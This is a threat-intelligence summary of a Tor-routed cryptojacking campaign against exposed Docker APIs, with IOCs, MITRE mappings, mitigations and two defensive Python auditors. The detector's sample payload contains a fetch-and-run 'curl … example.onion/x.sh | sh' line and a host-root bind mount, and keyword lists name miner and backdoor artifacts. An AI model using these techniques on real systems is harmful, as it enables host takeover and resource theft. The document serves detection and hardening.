Full Report
Misconfigured Docker instances are the target of a campaign that employs the Tor anonymity network to stealthily mine cryptocurrency in susceptible environments. "Attackers are exploiting misconfigured Docker APIs to gain access to containerized environments, then using Tor to mask their activities while deploying crypto miners," Trend Micro researchers Sunil Bharti and Shubham Singh said in an
Analysis Summary
# Tool/Technique: Cryptojacking via Exposed Docker APIs utilizing Tor
## Overview
This entry describes a cryptojacking campaign in which threat actors abuse misconfigured, Internet-exposed Docker Engine APIs to gain unauthorized access to containerized environments. The goals are to deploy the XMRig cryptocurrency miner and to route command-and-control (C2) traffic and payload retrieval through the Tor network so that the operators' infrastructure stays hidden.
## Technical Details
- Type: Tool/Technique (exploitation campaign)
- Platform: Linux hosts running Docker (containerized environments)
- Capabilities: host takeover via a bind mount of the host root filesystem (container escape), Tor anonymization, persistent backdoor via SSH configuration and key changes on the host, C2 beaconing, cryptocurrency mining, staging of network scanning tools
- First Seen: Trend Micro published its analysis the week before the article (article dated June 24, 2025)
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application (unauthenticated, Internet-exposed Docker Engine API)
- TA0002 - Execution
- T1610 - Deploy Container (attacker-created `alpine` container used to run the bootstrap script)
- TA0003 - Persistence
- T1098.004 - Account Manipulation: SSH Authorized Keys (attacker public key written to the host's `authorized_keys`, root SSH login enabled)
- TA0004 - Privilege Escalation
- T1611 - Escape to Host (host `/` bind-mounted at `/hostroot` inside the container, giving full read/write access to the host filesystem)
- TA0005 - Defense Evasion
- T1027 - Obfuscated Files or Information (Base64-encoded bootstrap script)
- TA0007 - Discovery
- T1046 - Network Service Discovery (`masscan` staged in the container)
- TA0011 - Command and Control
- T1071.001 - Application Layer Protocol: Web Protocols (payload fetched over HTTP from a `.onion` service)
- T1090.003 - Proxy: Multi-hop Proxy (C2 and download traffic routed through Tor)
- T1572 - Protocol Tunneling (SOCKS proxying through the local Tor client using the `socks5h` scheme, so name resolution also happens inside Tor)
- TA0040 - Impact
- T1496 - Resource Hijacking (XMRig mining on the victim's CPU)
## Functionality
### Core Capabilities
- **Container Access & Enumeration:** Initial access by calling the exposed Docker Engine API without credentials, followed by a container list request (`ContainerList`) to enumerate what is already running.
- **Container Creation and Escape:** Creation of a new container from the `alpine` image with the host's root directory `/` bind-mounted at `/hostroot` inside the container. Because the container can then read and write every file on the host, this is effectively a container escape.
- **Anonymization Setup:** Installation of Tor by a Base64-encoded shell script that is decoded and run as the container's command at creation time.
- **Traffic Anonymization:** Routing of downloads and C2 traffic through the local Tor client using the `socks5h://` proxy scheme. With `socks5h`, the client hands the hostname to the SOCKS proxy instead of resolving it itself, so DNS lookups do not leak outside Tor and `.onion` names can be resolved at all.
- **Persistence Mechanism:** Execution of `docker-init.sh` against the mounted host filesystem to modify the host's SSH configuration so that root login is permitted and to append an attacker-controlled public key to the host's `~/.ssh/authorized_keys`.
- **Malware Delivery:** Fetching and executing a remote script from a `.onion` service to deliver the final payload.
### Advanced Features
- **Cryptomining Payload:** Downloading and configuring the XMRig cryptocurrency miner, supplied with wallet addresses and mining pool URLs.
- **Tool Deployment:** Installation of network scanning tooling (`masscan` and the `libpcap` library it depends on) inside the compromised container, positioning the operators to scan for further exposed hosts.
- **C2 Beaconing:** Reporting details of the infected host back to the C2 server.
## Indicators of Compromise
- File Hashes: [Not explicitly provided in the summary text]
- File Names: `docker-init.sh`
- Registry Keys: Not applicable (Linux hosts)
- Network Indicators:
- Initial Access IP: `198.199.72[.]27`
- C2/Delivery `.onion` Domain: `wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion`
- Behavioral Indicators:
- Unauthenticated Docker Engine API calls from an unexpected source address, typically a container list followed by a container create.
- Container creation that bind-mounts the host root directory `/` (as `/hostroot` in this campaign) or other sensitive host paths into the container.
- Modification of the host's SSH daemon configuration and of `~/.ssh/authorized_keys` originating from a container process.
- Tor client installation and Tor traffic originating from a container, with downloads and C2 proxied through it via `socks5h`.
## Associated Threat Actors
- Not attributed; Trend Micro refers only to unnamed attackers.
## Detection Methods
- Signature-based detection: Signatures for the XMRig binary and for `docker-init.sh`, plus blocking of the listed initial-access IP. The summary does not publish file hashes.
- Behavioral detection: Monitoring Docker daemon activity (audit logs, `docker events`, or an authorizing proxy in front of the daemon socket) for container creation that bind-mounts sensitive host paths such as `/`, runs privileged, or passes a Base64-encoded command. Runtime detection of Tor installation, Tor processes, and unusual process execution inside containers.
- YARA rules: Not provided in the summary text.
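The following is an added example, not code from the original report or from Trend Micro: a review function for Docker Engine API `POST /containers/create` bodies that flags the behaviours listed above (host-root or other sensitive bind mounts, privileged containers, Base64-encoded commands that decode to Tor, `.onion`, `socks5h`, XMRig or SSH-backdoor references). It is written to be called from an authorizing proxy in front of the daemon socket or over captured request bodies; the sample payloads, the bootstrap script and the `example.onion` name are constructed placeholders shaped like the campaign, not the attackers' actual artifacts.

```python
import base64
import json
import re

# Host paths whose bind-mount into a container hands the container control of
# the host. "/" is what this campaign used; the others are common variants.
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/home", "/boot", "/proc", "/sys",
                        "/var/run/docker.sock", "/run/docker.sock")

# Keywords that, in a decoded Base64 command, point at Tor-routed cryptojacking
# or SSH backdooring. "tor" is word-bounded so "monitor" does not match.
SUSPICIOUS_DECODED = {
    "tor": re.compile(r"\btor\b"),
    ".onion": re.compile(r"\.onion\b"),
    "socks5h": re.compile(r"socks5h"),
    "xmrig": re.compile(r"xmrig"),
    "masscan": re.compile(r"masscan"),
    "authorized_keys": re.compile(r"authorized_keys"),
    "sshd_config": re.compile(r"sshd_config"),
}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def is_sensitive_host_path(path: str) -> bool:
    """True for "/" itself and for anything at or under the listed directories."""
    norm = path.rstrip("/") or "/"
    if norm == "/":
        return True
    return any(norm == p or norm.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def decoded_blobs(text: str):
    """Yield the UTF-8 text of every Base64 run in *text* that decodes cleanly."""
    for m in B64_BLOB.finditer(text):
        try:
            yield base64.b64decode(m.group(0), validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue


def _as_text(value) -> str:
    """Cmd and Entrypoint may be a string or a list of strings in the Engine API."""
    if value is None:
        return ""
    return value if isinstance(value, str) else " ".join(value)


def review_create_request(body: dict) -> list[str]:
    """Return findings for one POST /containers/create JSON body (empty if benign)."""
    findings = []
    hc = body.get("HostConfig") or {}
    if hc.get("Privileged"):
        findings.append("privileged container requested")
    for bind in hc.get("Binds") or []:
        host_side = bind.split(":", 1)[0]
        # Named volumes have no leading slash and are not host paths.
        if host_side.startswith("/") and is_sensitive_host_path(host_side):
            findings.append(f"sensitive host path bind-mounted: {bind}")
    for mount in hc.get("Mounts") or []:
        src = mount.get("Source") or ""
        if mount.get("Type") == "bind" and src.startswith("/") and is_sensitive_host_path(src):
            findings.append(f"sensitive host path bind-mounted: {src} -> {mount.get('Target')}")
    cmd_text = _as_text(body.get("Cmd")) + " " + _as_text(body.get("Entrypoint"))
    for decoded in decoded_blobs(cmd_text):
        hits = sorted(k for k, rx in SUSPICIOUS_DECODED.items() if rx.search(decoded.lower()))
        if hits:
            findings.append("base64 command decodes to a script referencing: " + ", ".join(hits))
    return findings


# Constructed samples. The bootstrap script is a stand-in shaped like the
# campaign's behaviour (install Tor, fetch from a .onion via socks5h); it is
# not the attackers' real script and example.onion is a placeholder.
_BOOTSTRAP = ("apk add --no-cache tor curl\n"
              "tor &\n"
              "curl -x socks5h://127.0.0.1:9050 http://example.onion/x.sh | sh\n")
MALICIOUS_CREATE = {
    "Image": "alpine",
    "Cmd": ["sh", "-c", "echo " + base64.b64encode(_BOOTSTRAP.encode()).decode() + " | base64 -d | sh"],
    "HostConfig": {"Binds": ["/:/hostroot"]},
}
BENIGN_CREATE = {
    "Image": "nginx:1.27",
    "Cmd": ["nginx", "-g", "daemon off;"],
    "HostConfig": {"Binds": ["webdata:/usr/share/nginx/html:ro"]},
}

if __name__ == "__main__":
    for name, body in (("malicious", MALICIOUS_CREATE), ("benign", BENIGN_CREATE)):
        print(name, json.dumps(review_create_request(body), indent=2))
```

The path check deliberately treats `/` specially: a naive prefix test against `/` would flag every absolute path, and a naive substring test would also flag `/etcetera`. Decoding is attempted only on runs of 40 or more Base64 characters with strict validation, which keeps short option strings and ordinary words from producing noise.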
## Mitigation Strategies
- **Docker Configuration Hardening:** Do not expose the Docker Engine API on the network. If a TCP listener is unavoidable, bind it to a management address, require mutual TLS (`tlsverify` with a client CA), and firewall the port; an unauthenticated Engine API is root on the host.
- **Principle of Least Privilege:** Run containers unprivileged and never bind-mount the host root directory (`/`) or other sensitive host paths into a container unless absolutely necessary and audited.
- **Network Segmentation:** Isolate container infrastructure and restrict egress so that a compromised container cannot reach Tor or arbitrary Internet hosts, limiting the blast radius of an escape.
- **SSH Hardening on Hosts:** Set `PermitRootLogin` to `no` (or `prohibit-password`) in the host's SSH daemon configuration, and monitor `sshd_config` and `~/.ssh/authorized_keys` for changes, since this campaign persists by editing both.
- **Monitor Process Execution:** Use runtime security monitoring to detect network scanning tools (`masscan`) and cryptocurrency miner processes (XMRig) running inside containers.
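As an added example (not code from the original report or from Trend Micro), the following audits the three host settings this campaign relies on: a Docker `daemon.json` with a TCP listener that lacks `tlsverify` or binds every interface, an `sshd_config` with `PermitRootLogin yes`, and `authorized_keys` entries outside an allowlist. The weak and hardened `daemon.json` samples, the `sshd_config` sample, the key blobs and the `/etc/docker/ca.pem` style paths are all constructed placeholders.

```python
import json
import re

# Constructed samples, not taken from any real host. The key blobs are made up.
WEAK_DAEMON_JSON = json.dumps({"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]})
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})
WEAK_SSHD_CONFIG = "Port 22\n# allow root\nPermitRootLogin yes\nPasswordAuthentication no\n"
ALLOWED_KEY = "AAAAC3NzaC1lZDI1NTE5AAAAIExampleAllowedKeyBlobNotReal0000000000"
PLANTED_KEY = "AAAAC3NzaC1lZDI1NTE5AAAAIExamplePlantedKeyBlobNotReal1111111111"
SAMPLE_AUTHORIZED_KEYS = (f"ssh-ed25519 {ALLOWED_KEY} ops@bastion\n"
                          "# added by deployment\n"
                          f"ssh-ed25519 {PLANTED_KEY} root@localhost\n")

KEY_LINE = re.compile(
    r"(?:^|\s)(ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-nistp(?:256|384|521)|sk-[A-Za-z0-9@.-]+)"
    r"\s+([A-Za-z0-9+/]+={0,2})(?:\s+(.*))?$")


def audit_daemon_json(text: str) -> list[str]:
    """Flag daemon.json settings that expose the Engine API on the network."""
    cfg = json.loads(text)
    findings = []
    for host in cfg.get("hosts") or []:
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// listeners are local only
        if not cfg.get("tlsverify"):
            findings.append(f"{host}: TCP listener without tlsverify; any client that "
                            "can reach the port has root on the host")
        if host[len("tcp://"):].startswith(("0.0.0.0", "[::]", ":")):
            findings.append(f"{host}: bound to all interfaces; bind to a management "
                            "address and firewall it")
    return findings


def audit_sshd_config(text: str) -> list[str]:
    """Flag an effective PermitRootLogin yes. sshd uses the first value it sees
    for a keyword, so the first non-comment line wins; directives inside Match
    blocks are conditional and are ignored here (a simplification)."""
    effective = {}
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        parts = stripped.split(None, 1)
        key = parts[0].lower()
        if key == "match":
            break
        effective.setdefault(key, parts[1].strip() if len(parts) > 1 else "")
    if effective.get("permitrootlogin", "").lower() == "yes":
        return ["PermitRootLogin yes: any key planted in root's authorized_keys gives "
                "a root shell; set it to no or prohibit-password"]
    return []


def audit_authorized_keys(text: str, allowed_blobs: set) -> list[str]:
    """Return every key whose public-key blob is not in the allowlist."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = KEY_LINE.search(line)
        if not m:
            findings.append(f"line {lineno}: unparseable entry: {line.strip()[:60]}")
            continue
        ktype, blob, comment = m.group(1), m.group(2), (m.group(3) or "").strip()
        if blob not in allowed_blobs:
            findings.append(f"line {lineno}: unexpected {ktype} key ({comment or 'no comment'})")
    return findings


if __name__ == "__main__":
    print("weak daemon.json:", audit_daemon_json(WEAK_DAEMON_JSON))
    print("hardened daemon.json:", audit_daemon_json(HARDENED_DAEMON_JSON))
    print("sshd_config:", audit_sshd_config(WEAK_SSHD_CONFIG))
    print("authorized_keys:", audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, {ALLOWED_KEY}))
```

On a real host, feed the functions the contents of `/etc/docker/daemon.json`, `/etc/ssh/sshd_config` and `/root/.ssh/authorized_keys`, with the allowlist taken from configuration management rather than from the file being audited. The hardened `daemon.json` sample passes clean because its only TCP listener is on a single management address with mutual TLS required.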
## Related Tools/Techniques
- Cryptojacking tools (e.g., XMRig)
- Container escape by bind-mounting sensitive host paths (such as `/`) into an attacker-controlled container
- Use of Tor for C2 infrastructure obfuscation.